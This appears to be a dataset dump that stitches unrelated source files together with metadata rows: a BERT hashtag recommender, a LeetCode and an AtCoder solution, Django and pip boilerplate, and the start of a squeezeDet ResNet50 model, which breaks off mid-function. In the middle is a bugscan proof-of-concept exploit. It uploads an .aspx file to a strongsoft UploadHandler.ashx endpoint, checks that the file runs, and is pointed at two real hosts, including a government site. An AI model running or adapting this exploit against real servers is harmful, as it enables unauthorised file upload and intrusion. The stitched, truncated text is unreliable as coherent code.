self.dropout_1 = nn.Dropout(dropout)
self.dropout_2 = nn.Dropout(dropout)
def forward(self, x, mask, non_pad_mask, dropout=False):
if dropout==True:
output=self.dropout_1(self.multi_head_self_attention(x, x, mask, dropout=True))
output=output.masked_fill(non_pad_mask==0, 0)
output=self.dropout_2(self.ffn(output, dropout=True))
output=output.masked_fill(non_pad_mask==0, 0)
else:
output = self.multi_head_self_attention(x, x, mask)
output = output.masked_fill(non_pad_mask == 0, 0)
output = self.ffn(output)
output = output.masked_fill(non_pad_mask == 0, 0)
return output
#################################################### Layer ##############################################################
class Transformer_new(nn.Module):
def __init__(self, hidden_dim=hidden_dim, hidden_dim_=hidden_dim): # default=512
# Assign instance variables
super().__init__()
self.hidden = hidden_dim
self.segment_embed = nn.Embedding(3, hidden_dim)
self.sequence_embed = Parameter(torch.randn(512+(5+1)+(49+1), hidden_dim))
self.know_embed=nn.Embedding(540, hidden_dim)
#weight initialization
self.segment_embed.weight.data.uniform_(-0.01, 0.01)
self.know_embed.weight.data.uniform_(-0.01, 0.01)
nn.init.xavier_normal_(self.sequence_embed)
self.encoder1=Encoder_layer(hidden_dim, hidden_dim_)
self.encoder2 = Encoder_layer(hidden_dim, hidden_dim_)
self.encoder3 = Encoder_layer(hidden_dim, hidden_dim_)
#self.encoder4 = Encoder_layer(hidden_dim, hidden_dim_)
#self.encoder5 = Encoder_layer(hidden_dim, hidden_dim_)
#self.encoder6 = Encoder_layer(hidden_dim, hidden_dim_)
def input_embedding(self, batch_text, batch_know): # x: (batch, input_len, )
b_size, s_len, _=batch_text.shape
mixed=torch.cat([self.know_embed(batch_know), batch_text], dim=1)
segment=torch.tensor([1]*6+[2]*s_len).to(device)
return mixed+self.segment_embed(segment)+self.sequence_embed[:mixed.shape[1]].unsqueeze(0).repeat(b_size, 1, 1) # (input_len, hidden_dim)
def forward(self, batch_text, batch_know, attention_mask, dropout):
b_size, s_len, _=batch_text.shape
x1= self.input_embedding(batch_text, batch_know) # (input_len, hidden)
###################################### make non_pad_mask #####################################################
if device.type=='cpu':
margin=torch.tensor([1] * (x1.shape[1]-s_len)).repeat(b_size, 1).byte().to(device)
else:
margin = torch.tensor([1] * (x1.shape[1] - s_len)).repeat(b_size, 1).bool().to(device)
non_pad_mask = torch.cat([margin, attention_mask], dim=1).unsqueeze(-1).repeat(1, 1, self.hidden).float()
mask_e = (torch.cat([margin, attention_mask], dim=1).unsqueeze(1).repeat(1, x1.shape[1], 1)==0)
################################################################################################################
x1=x1.masked_fill(non_pad_mask==0, 0)
########################################################
x2 = self.encoder1(x1, mask_e, non_pad_mask, dropout=dropout)
x3 = self.encoder2(x2 + x1, mask_e, non_pad_mask, dropout=dropout)
x4 = self.encoder3(x3 + x2 + x1, mask_e, non_pad_mask, dropout=dropout)
#x5 = self.encoder4(x4 + x3 + x2 + x1, mask_e, non_pad_mask, dropout=dropout)
#x6 = self.encoder5(x5 + x4 + x3 + x2 + x1, mask_e, non_pad_mask, dropout=dropout)
#x7 = self.encoder6(x6 + x5 + x4 + x3 + x2 + x1, mask_e, non_pad_mask, dropout=dropout)
return x4
pretrained_weights = 'bert-base-uncased'
tokenizer = BertTokenizer.from_pretrained(pretrained_weights)
bert = BertModel.from_pretrained(pretrained_weights,
output_hidden_states=True,
output_attentions=True, force_download=True)
class Bert(nn.Module):
def __init__(self):
# Assign instance variables
super(Bert, self).__init__()
self.bert = copy.deepcopy(bert)
def forward(self, x, attention_mask, token_type_ids):
outputs= self.bert(x, attention_mask=attention_mask, token_type_ids=token_type_ids)
last_encoder_output = outputs[0]
return last_encoder_output
class NextSentencePrediction(nn.Module):
"""
    BERT's next-sentence head repurposed as the hashtag classifier:
    maps the [CLS] representation to one logit per hashtag
"""
def __init__(self, hidden):
"""
:param hidden: BERT model output size
"""
super().__init__()
self.linear = nn.Linear(hidden, hashtag_size)
nn.init.xavier_normal_(self.linear.weight)
def forward(self, x):
return self.linear(x[:, 0])
class BERTLM_new(nn.Module):
"""
    Hashtag recommendation model:
    pretrained BERT encoder + extra transformer layers + hashtag prediction head
"""
def __init__(self, vocab_size):
"""
:param bert: BERT model which should be trained
:param vocab_size: total vocab size for masked_lm
"""
super().__init__()
self.bert = Bert()
self.next_sentence = NextSentencePrediction(768)
self.Loss = 0
self.softmax = nn.Softmax(-1)
self.transformer_new=Transformer_new()
def forward(self, batch_loc_text, batch_img, batch_know, segment, dropout):
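        # batch_img is accepted for interface parity but not consumed here:
        # per the file header, this variant fuses text + location + knowledge only.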
attention_mask=(batch_loc_text!=tokenizer.pad_token_id)
x = self.bert(batch_loc_text, attention_mask=attention_mask.float(), token_type_ids=segment)
x=self.transformer_new(x, batch_know, attention_mask, dropout)
return self.next_sentence(x)
def bptt(self, batch_loc_text, batch_img, batch_know, segment, label, dropout): # (batch_size, out_len)
next_sentence = self.forward(batch_loc_text, batch_img, batch_know, segment, dropout)
sigmoid = torch.sigmoid(next_sentence)
re_label = (label == 0).float()
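        # p equals sigmoid for positive tags and (1 - sigmoid) for negative ones,
        # so -log(p) below is an element-wise binary cross-entropy over all tags.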
p = (re_label - sigmoid) * (re_label - label)
# focal_factor=(1-p)**2
loss_matrix = -torch.log(p) # *focal_factor
loss = torch.mean(loss_matrix)
"""""
softmax=self.softmax(next_sentence)
p=softmax[label==1]
print(p)
pos_matrix=-torch.log(p)
loss=torch.mean(pos_matrix)
"""""
return loss
# Performs one step of SGD.
def numpy_sdg_step(self, batch, optimizer, lrate, dropout):
# Calculate the gradients
optimizer.zero_grad()
loss = self.bptt(torch.tensor(batch[0]).to(device).long(), torch.tensor(batch[1]).to(device).float(),
torch.tensor(batch[2]).to(device).long(), torch.tensor(batch[3]).to(device).long(),
torch.tensor(batch[4]).to(device).float(), dropout)
loss.backward()
optimizer.step()
# optimizer.param_groups[0]['lr'] = lrate
return loss
def train_with_batch(self, info, batch_val, optimizer):
val_precision = []
Loss_len = 0
num_examples_seen = 1
# nepoch=nb_epoch()
nepoch = 1000
print('training epoch :', nepoch)
        print('length of batch :', int(len(info[0]) / SEN_LEN))
for epoch in range(nepoch):
            print("epoch", epoch + 1)
batch_train = generate_batch(info[0], info[1], info[2], info[3])
for i in range(len(batch_train)):
batch_loc_text, batch_img, batch_know, segment, batch_y, true_label = batch_train[i]
# print(np.shape(batch_know)) # [batch_size, cat_num]
# 3factors or 4factors
                lrate = math.pow(64, -0.5) * min(math.pow(num_examples_seen, -0.5),
                                                 num_examples_seen * math.pow(4000, -1.5))  # warm up step : default 4000
loss = self.numpy_sdg_step((batch_loc_text, batch_img, batch_know, segment, batch_y), optimizer,
lrate, True)
self.Loss += loss.item()
Loss_len += 1
if num_examples_seen % 1000 == 0: # origin = int(batch_len * nepoch / 100)
time_ = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print(time_, ' ', int(100 * num_examples_seen / (len(batch_train) * nepoch)), end='')
                    print('% complete!!!', end='')
print(' loss :', self.Loss / Loss_len) # , ' lr :', lrate)
self.Loss = 0
Loss_len = 0
num_examples_seen += 1
print('Epoch', epoch + 1, 'completed out of', nepoch)
            # valid set : 8104 examples
val_pred = []
val_truth = []
for i in range(len(batch_val)):
model.eval()
batch_loc_text, batch_img, batch_know, segment, batch_y, true_label = batch_val[i]
val_prob = self.softmax(
self.forward(torch.tensor(batch_loc_text).to(device).long(), torch.tensor(batch_img).to(device).float(),
torch.tensor(batch_know).to(device).long(), torch.tensor(segment).to(device).long(), False))
# if last_function() == "softmax":
y_pred = np.argsort(val_prob.detach().cpu().numpy(), axis=1)
            for j in range(y_pred.shape[0]):
                val_pred.append(y_pred[j])
                val_truth.append(true_label[j])
precision = top1_acc(val_truth, val_pred)
print("Epoch:", (epoch + 1), "val_precision:", precision)
val_precision.append(precision)
torch.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'num_examples_seen' : num_examples_seen
}, 'project3_bert23_checkpoint/epoch='+str(epoch))
return val_precision
def max_length(list):
max = 0
for i in list:
if max < len(i):
max = len(i)
return max
SEN_LEN = 5
# Train on a small subset of the data to see what happens
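# generate_batch groups SEN_LEN posts at a time; each entry drops its leading
# example index, and the [CLS] location [SEP] text [SEP] ids are padded to the
# group's longest sequence (capped at 512 for BERT).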
def generate_batch(new_loc_text_list, new_loc_list, data, len_hashtag):
batch = []
temp_loc_text = []
temp_seg=[]
temp_img = []
temp_know = []
temp_y = []
temp_y_ = []
random.shuffle(new_loc_text_list)
key = new_loc_text_list
k = max_length(key[:SEN_LEN]) - 1
if k > 512:
k = 512
max_num_sen = SEN_LEN
num_sen = 0
total_num_sen = 0
for i in key:
loc_data=new_loc_list[i[0]][1:]
loc_text_seg=[0]*len(loc_data)+[1]*(k-len(loc_data))
temp_seg.append(loc_text_seg)
loc_text_data=i[1:]
if len(loc_text_data) <= k:
temp_loc_text.append( loc_text_data+ [tokenizer.pad_token_id] * (k - len(loc_text_data)))
else:
# print('error')
temp_loc_text.append(loc_text_data[:511] + [tokenizer.sep_token_id])
temp_img.append(data[0][i[0]])
temp_know.append(data[4][i[0]])
one_hot_y = []
for j in range(len_hashtag):
if j in data[3][i[0]]:
one_hot_y.append(1)
else:
one_hot_y.append(0)
temp_y.append(one_hot_y)
temp_y_.append(data[3][i[0]])
num_sen += 1
total_num_sen += 1
if num_sen == max_num_sen:
if total_num_sen >= len(key):
break
k = max_length(key[total_num_sen:total_num_sen + SEN_LEN]) - 1
if k > 512:
k = 512
max_num_sen = SEN_LEN
num_sen = 0
batch.append((temp_loc_text, temp_img, temp_know, temp_seg, temp_y, temp_y_))
temp_loc_text = []
temp_seg = []
temp_img = []
temp_know = []
temp_y = []
temp_y_ = []
batch.append((temp_loc_text, temp_img, temp_know, temp_seg, temp_y, temp_y_))
return batch
if __name__ == '__main__':
print("co-attention_" + evaluation_factor())
if evaluation_factor() == '1factor':
print("factor:", which_factor())
if evaluation_factor() == '2factors' or evaluation_factor() == '3factors':
print("connection:", connection())
print("last function:", last_function())
print("current working directory:", os.getcwd())
print('loading data...')
with open("project3_data/vocabulary_keras_h.pkl", "rb") as f:
data = pickle.load(f)
vocabulary = data[0]
hashtagVoc = data[2]
vocabulary_inv = {}
hashtagVoc_inv = {}
hashtagCount = {}
for k, v in vocabulary.items():
vocabulary[k] = v + 2
vocabulary["<Padding>"] = 0
vocabulary['<CLS>'] = 1
vocabulary['<SEP>'] = 2
for i in vocabulary.keys():
vocabulary_inv[vocabulary[i]] = i
for i in hashtagVoc.keys():
hashtagVoc_inv[hashtagVoc[i]] = i
hashtagCount[hashtagVoc[i]] = []
print("vocabulary 스펙:", len(vocabulary), max(vocabulary.values()), min(vocabulary.values()))
print("hashtagVoc 스펙 :", len(hashtagVoc), max(hashtagVoc.values()), min(hashtagVoc.values()))
print("len(hashtagVoc_inv)", len(hashtagVoc_inv))
    # Add the knowledge base
k_train, k_val, k_test = load_k()
print(len(k_train), len(k_val), len(k_test))
################################# for padding, cls, sep ########################################################
for index, categories in enumerate(k_train):
temp_category = []
for category in categories:
temp_category.append(category + 2)
temp_category.append(2)
k_train[index] = temp_category
for index, categories in enumerate(k_val):
temp_category = []
for category in categories:
temp_category.append(category + 2)
temp_category.append(2)
k_val[index] = temp_category
for index, categories in enumerate(k_test):
temp_category = []
for category in categories:
temp_category.append(category + 2)
temp_category.append(2)
k_test[index] = temp_category
####################################################################################################################
val_data = []
val_data.append(np.load("project3_transformer_data/transformer_image_90_val.npy"))
print("validation data loading finished.")
with open("project3_data/val_tlh_keras_h.bin", "rb") as f:
val_data.extend(pickle.load(f))
print("validation data 업로드")
new_val_text_list = []
for index, sentece in enumerate(val_data[1]):
temp_sen_ = []
for word in sentece:
if word == 0:
pass
else:
temp_sen_.append(word + 2)
temp_sen_ = [tokenizer.sep_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen_]))+[tokenizer.sep_token_id]
new_val_text_list.append(temp_sen_)
new_val_loc_list = []
for index, sentence in enumerate(val_data[2][:, -17:]):
temp_sen = []
for word in sentence:
if word == 0:
pass
else:
temp_sen.append(word + 2)
temp_sen=[tokenizer.cls_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen]))+[tokenizer.sep_token_id]
temp_sen.insert(0, index)
new_val_loc_list.append(temp_sen)
new_val_loc_text_list=[]
for x, y in zip(new_val_loc_list, new_val_text_list):
new_val_loc_text_list.append(x+y[1:])
val_data.append(k_val)
print(len(val_data[0]), len(val_data[1]), len(val_data[2]), len(val_data[3]), len(val_data[4]))
# val_data = check_hashzero(val_data)
# print("check 완")
test_data = []
test_data.append(np.load("project3_transformer_data/transformer_image_90_test.npy"))
print("test data loading finished.")
with open("project3_data/test_tlh_keras_h.bin", "rb") as f:
test_data.extend(pickle.load(f))
print("test data 업로드")
new_test_text_list = []
for index, sentece in enumerate(test_data[1]):
temp_sen_ = []
for word in sentece:
if word == 0:
pass
else:
temp_sen_.append(word + 2)
temp_sen_ = [tokenizer.sep_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen_]))+[tokenizer.sep_token_id]
new_test_text_list.append(temp_sen_)
new_test_loc_list = []
for index, sentece in enumerate(test_data[2][:, -17:]):
temp_sen = []
for word in sentece:
if word == 0:
pass
else:
temp_sen.append(word + 2)
temp_sen=[tokenizer.cls_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen]))+[tokenizer.sep_token_id]
temp_sen.insert(0, index)
new_test_loc_list.append(temp_sen)
new_test_loc_text_list = []
for x, y in zip(new_test_loc_list, new_test_text_list):
new_test_loc_text_list.append(x+y[1:])
test_data.append(k_test)
print(len(test_data[0]), len(test_data[1]), len(test_data[2]), len(test_data[3]), len(test_data[4]))
# test_data = check_hashzero(test_data)
# print("check 완")
train_data = []
train_data.append(np.load("project3_transformer_data/transformer_image_90_train.npy"))
print("train data loading finished.")
# with open("./project3_data/train_tlh_keras_h.bin", "rb") as f:
with open("project3_data/train_tlh_keras_h.bin", "rb") as f:
train_data.extend(pickle.load(f))
print("train data 업로드")
############################################################################
batch_val = generate_batch(new_val_loc_text_list, new_val_loc_list, val_data, len(hashtagVoc))
batch_test = generate_batch(new_test_loc_text_list, new_test_loc_list, test_data, len(hashtagVoc))
############################################################################
new_train_text_list = []
for index, sentece in enumerate(train_data[1]):
temp_sen_ = []
for word in sentece:
if word == 0:
pass
else:
temp_sen_.append(word + 2)
temp_sen_ = [tokenizer.sep_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen_]))+[tokenizer.sep_token_id]
new_train_text_list.append(temp_sen_)
new_train_loc_list = []
for index, sentence in enumerate(train_data[2][:, -17:]):
temp_sen = []
for word in sentence:
if word == 0:
pass
else:
temp_sen.append(word + 2)
temp_sen = [tokenizer.cls_token_id]+tokenizer.encode(' '.join([vocabulary_inv[j] for j in temp_sen]))+[tokenizer.sep_token_id]
temp_sen.insert(0, index)
new_train_loc_list.append(temp_sen)
new_train_loc_text_list = []
for x, y in zip(new_train_loc_list, new_train_text_list):
new_train_loc_text_list.append(x+y[1:])
train_data.append(k_train)
print(len(train_data[0]), len(train_data[1]), len(train_data[2]), len(train_data[3]))
print("train data size: ", len(train_data[3]))
    text_maxlen = len(train_data[1][0]) # 411, check this is right
loc_maxlen = len(train_data[2][0]) # 19
print("text_maxlen:", text_maxlen)
print("loc_maxlen:", loc_maxlen)
vocab_size = len(vocabulary_inv) # 26210
hashtag_size = len(hashtagVoc_inv) # 2988
print('-')
print('Vocab size:', vocab_size, 'unique words')
print('Hashtag size:', hashtag_size, 'unique hashtag')
for index, taglist in enumerate(train_data[3]):
for tag in taglist:
hashtagCount[int(tag)].append(index)
cnt = 0
for i in list(hashtagCount.keys()):
if len(hashtagCount[i]) == 0:
del hashtagCount[i]
hashtagCount_saved = copy.deepcopy(hashtagCount)
torch.manual_seed(10)
model = BERTLM_new(vocab_size).to(device)
optimizer = torch.optim.Adam(model.parameters(), betas=(0.9, 0.999), eps=1e-9, lr=1e-5)
print("starts training...")
val_precision = model.train_with_batch((new_train_loc_text_list, new_train_loc_list, train_data, len(hashtagVoc)), batch_val, optimizer)
print("\ntop1 결과 정리")
print("validation")
for i in range(len(val_precision)):
print("epoch", i + 1, "- precision:", val_precision[i])
# print("attention vector weights")
# print_order = ["i_w_it", "i_w_il", "i_w_ik", "t_w_it", "t_w_lt", "t_w_tk", "l_w_lt",
# "l_w_il", "l_w_lk", "k_w_ik", "k_w_tk", "k_w_lk"]
# print(attention_weights)
# with open("./result_weight/" + evaluation_factor() + ".txt", "w") as ff:
# ff.write("순서대로 i_w_it, i_w_il, i_w_ik, t_w_it, t_w_lt, t_w_tk, l_w_lt, l_w_il, l_w_lk, k_w_ik, k_w_tk, k_w_lk")
# for q in range(len(attention_weights)):
# ff.write(print_order[q] + " : " + str(attention_weights[q]) + "\n")
# with open("./result_weight/" + evaluation_factor() + ".bin", "wb") as ff:
# pickle.dump(attention_weights, ff)
#
| [
"[email protected]"
] | |
c74f7972df03e772c45471dfc507ca6f5efa0d51 | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/118a320c-1596.py | 3205edb6500e7b3aae3542131bb1317f8a8cac3c | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,609 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
#__Author__ = treeoph
import re,urlparse
def assign(service, arg):
if service=='strongsoft':
return True,arg
def audit(arg):
p=urlparse.urlparse(arg)
raw='''POST /SysManage/AjaxHandler/UploadHandler.ashx HTTP/1.1
Host: {netloc}
Content-Length: 1305
Origin: {scheme}://{netloc}
X-Requested-With: ShockwaveFlash/20.0.0.267
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Accept: */*
Referer: {scheme}://{netloc}/CommonReport/TableList.aspx?TableDBID=1009&pagetype=page&menuid=136
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Filename"
test.aspx
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="GetFileName"
y
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="DataType"
UploadFile
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="GetFileInfo"
y
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="UploadFolder"
/CommonReport/
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="fileext"
*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.mpp;*.vsd;*.jpg;*.png;*.gif;*.bmp
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="TCID"
1009
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="folder"
/CommonReport/UploadFile
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Filedata"; filename="test.aspx"
Content-Type: application/octet-stream
GIF89a
testvul
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Upload"
Submit Query
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4--'''
code,head,res,errcode, _=curl.curl2(arg+'SysManage/AjaxHandler/UploadHandler.ashx',raw=raw.format(scheme=p.scheme,netloc=p.netloc))
if code == 200 and res:
m=re.search(r'([\w\/\d]+\.aspx)',res)
if m:
file_url='http://%s/%s'%(p.netloc,m.group())
code,head,res,errcode, _=curl.curl2(file_url)
            if res and 'testvul' in res:  # guard: the second request may return an empty/None body
security_hole("Upload File at "+file_url)
if __name__=='__main__':
from dummy import *
audit(assign('strongsoft','http://www.hzwr.gov.cn:8080/')[1])
audit(assign('strongsoft','http://60.191.198.109:8060/')[1]) | [
"[email protected]"
] | |
6ae7560c7fe931a9cb233dbb80213d11ee6f4c7f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p04001/s207133170.py | 880c6edc03d8bb2cff7f1a58a4507040bed759aa | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | py | S = input()
# TODO: build the candidate lists with a recursive function, e.g. [s1, "+", s2, s3, "+", s4]
result = []
def dfs(i, list):
if i == len(S):
result.append(list)
return
else:
if i == len(S) - 1:
return dfs(i+1, list+[S[i]])
else:
return dfs(i+1, list+[S[i]]), dfs(i+1, list+[S[i], "+"])
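# e.g. S = "125": 125 + (1+25) + (12+5) + (1+2+5) = 125 + 26 + 17 + 8 = 176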
# TODO: compute the sum according to each list
dfs(0, [])
ans = 0
for l in result:
sum_of_l = 0
sequence = 0
for id in range(len(l)):
if l[id] == "+":
sum_of_l += sequence
sequence = 0
else:
sequence *= 10
sequence += int(l[id])
sum_of_l += sequence
ans += sum_of_l
print(ans)
| [
"[email protected]"
] | |
58c0b95d752a1cb35fe77a104190da67ab2925e7 | f6ea25823706fe7db053b69639c57431ffc7c8be | /Datacademy/venv/bin/pip | 5c7c8fd81e8f939cc5339c0a391c385f819336c4 | [] | no_license | BobbyJoeSmith3/Week10Hacks | 6f57d34a16a01c6a019730539257910b878eef11 | 43aba9b979bc26ec118eb4af4b0d0149ee87461c | refs/heads/master | 2021-01-18T13:42:34.055202 | 2014-06-26T15:36:50 | 2014-06-26T15:36:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | #!/home/bobbyjoesmith/Training/Week10/Week10Hacks/Datacademy/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
709eb35365d3a06bd9f24087e46777e7a7b37dee | 2b255d07420114c40f6c8aeb0fb25228588282ed | /sitecomber/apps/config/management/commands/crawl_page.py | f50bc927ac3a48312f85620262611ccad9a81b10 | [] | no_license | ninapavlich/sitecomber | b48b3ee055dac1f419c98f08fffe5e9dc44bd6e3 | 6f34e5bb96ca4c119f98ee90c88881e8ca3f6f06 | refs/heads/master | 2022-12-11T20:55:07.215804 | 2020-03-13T07:58:28 | 2020-03-13T07:58:28 | 197,045,165 | 1 | 0 | null | 2022-12-08T01:47:52 | 2019-07-15T17:42:31 | JavaScript | UTF-8 | Python | false | false | 1,015 | py | import logging
from django.core.management.base import BaseCommand
from django.core.exceptions import ObjectDoesNotExist
from sitecomber.apps.results.models import PageResult
logger = logging.getLogger('django')
class Command(BaseCommand):
"""
Example Usage:
Load and parse page result with primary key 1:
python manage.py crawl_page 1
"""
help = 'Crawl Site'
def add_arguments(self, parser):
parser.add_argument('page_result_pk', nargs='+', type=int)
def handle(self, *args, **options):
page_result_pk = int(options['page_result_pk'][0])
logger.info("Going to load page %s" % (page_result_pk))
try:
page = PageResult.objects.get(pk=page_result_pk)
except ObjectDoesNotExist:
logger.error(u"Could not find page result with primary key = %s" % (page_result_pk))
return
page.load()
tests = page.site_domain.site.tests
for test in tests:
test.page_parsed(page)
| [
"[email protected]"
] | |
626a4d10d7b29271ed92d511a73c67b98affecb1 | bf8f377422db9954b81cc44259f0450f7799541d | /pawn_stars/wsgi.py | 7db541520d3b5221158eb09ea6282ea4bf8a8fdb | [
"MIT"
] | permissive | team-pawn-stars/PawnStars-Backend | c7acaaa10fa2f40f77822e5a99af0a9890797471 | b1ea9d29adea65b3004555386b51e488460d1b30 | refs/heads/master | 2020-05-04T13:55:34.080903 | 2019-06-13T12:59:55 | 2019-06-13T12:59:55 | 179,179,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
WSGI config for pawn_stars project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pawn_stars.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
e8dd6a42a1f6eb6d94cefb986c43a7cd569be71b | 48e08c7d5856c35492500b6b01d3d72a31f58ffc | /Leetcode/0051-0100/0086-partition-list.py | 74ffde18be275050ee72f79c301933fb36d60ee1 | [
"MIT"
] | permissive | MiKueen/Data-Structures-and-Algorithms | 8d8730e539e1c112cbd4a51beae9e1c3e2184e63 | 8788bde5349f326aac0267531f39ac7a2a708ee6 | refs/heads/master | 2021-07-18T17:16:39.948239 | 2020-09-13T15:44:37 | 2020-09-13T15:44:37 | 212,309,543 | 0 | 1 | MIT | 2019-10-06T16:24:43 | 2019-10-02T10:19:07 | Python | UTF-8 | Python | false | false | 1,079 | py | '''
Author : MiKueen
Level : Medium
Problem Statement : Partition List
Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.
You should preserve the original relative order of the nodes in each of the two partitions.
Example:
Input: head = 1->4->3->2->5->2, x = 3
Output: 1->2->2->4->3->5
'''
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def partition(self, head, x):
"""
:type head: ListNode
:type x: int
:rtype: ListNode
"""
left = left_head = ListNode(0)
right = right_head = ListNode(0)
while head:
if head.val < x:
left.next = head
left = left.next
else:
right.next = head
right = right.next
head = head.next
right.next = None
left.next = right_head.next
return left_head.next
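
# Walkthrough of the docstring example with x = 3:
#   the left chain gathers 1->2->2, the right chain gathers 4->3->5,
#   and splicing left onto right yields 1->2->2->4->3->5.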
| [
"[email protected]"
] | |
684022b71ef0d7261d8e43295a62ebc0b0fd84be | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/BichenWuUCB_squeezeDet/squeezeDet-master/src/nets/resnet50_convDet.py | b1d4cde60ed5f428dd7949a8c1ad08f053b0b4cf | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 6,835 | py | # Author: Bichen Wu ([email protected]) 08/25/2016
"""ResNet50+ConvDet model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import joblib
from utils import util
from easydict import EasyDict as edict
import numpy as np
import tensorflow as tf
from nn_skeleton import ModelSkeleton
class ResNet50ConvDet(ModelSkeleton):
def __init__(self, mc, gpu_id):
with tf.device('/gpu:{}'.format(gpu_id)):
ModelSkeleton.__init__(self, mc)
self._add_forward_graph()
self._add_interpretation_graph()
self._add_loss_graph()
self._add_train_graph()
self._add_viz_graph()
def _add_forward_graph(self):
"""NN architecture."""
mc = self.mc
if mc.LOAD_PRETRAINED_MODEL:
assert tf.gfile.Exists(mc.PRETRAINED_MODEL_PATH), \
'Cannot find pretrained model at the given path:' \
' {}'.format(mc.PRETRAINED_MODEL_PATH)
self.caffemodel_weight = joblib.load(mc.PRETRAINED_MODEL_PATH)
conv1 = self._conv_bn_layer(
self.image_input, 'conv1', 'bn_conv1', 'scale_conv1', filters=64,
size=7, stride=2, freeze=True, conv_with_bias=True)
pool1 = self._pooling_layer(
'pool1', conv1, size=3, stride=2, padding='VALID')
with tf.variable_scope('conv2_x') as scope:
with tf.variable_scope('res2a'):
branch1 = self._conv_bn_layer(
pool1, 'res2a_branch1', 'bn2a_branch1', 'scale2a_branch1',
filters=256, size=1, stride=1, freeze=True, relu=False)
branch2 = self._res_branch(
pool1, layer_name='2a', in_filters=64, out_filters=256,
down_sample=False, freeze=True)
res2a = tf.nn.relu(branch1+branch2, 'relu')
with tf.variable_scope('res2b'):
branch2 = self._res_branch(
res2a, layer_name='2b', in_filters=64, out_filters=256,
down_sample=False, freeze=True)
res2b = tf.nn.relu(res2a+branch2, 'relu')
with tf.variable_scope('res2c'):
branch2 = self._res_branch(
res2b, layer_name='2c', in_filters=64, out_filters=256,
down_sample=False, freeze=True)
res2c = tf.nn.relu(res2b+branch2, 'relu')
with tf.variable_scope('conv3_x') as scope:
with tf.variable_scope('res3a'):
branch1 = self._conv_bn_layer(
res2c, 'res3a_branch1', 'bn3a_branch1', 'scale3a_branch1',
filters=512, size=1, stride=2, freeze=True, relu=False)
branch2 = self._res_branch(
res2c, layer_name='3a', in_filters=128, out_filters=512,
down_sample=True, freeze=True)
res3a = tf.nn.relu(branch1+branch2, 'relu')
with tf.variable_scope('res3b'):
branch2 = self._res_branch(
res3a, layer_name='3b', in_filters=128, out_filters=512,
down_sample=False, freeze=True)
res3b = tf.nn.relu(res3a+branch2, 'relu')
with tf.variable_scope('res3c'):
branch2 = self._res_branch(
res3b, layer_name='3c', in_filters=128, out_filters=512,
down_sample=False, freeze=True)
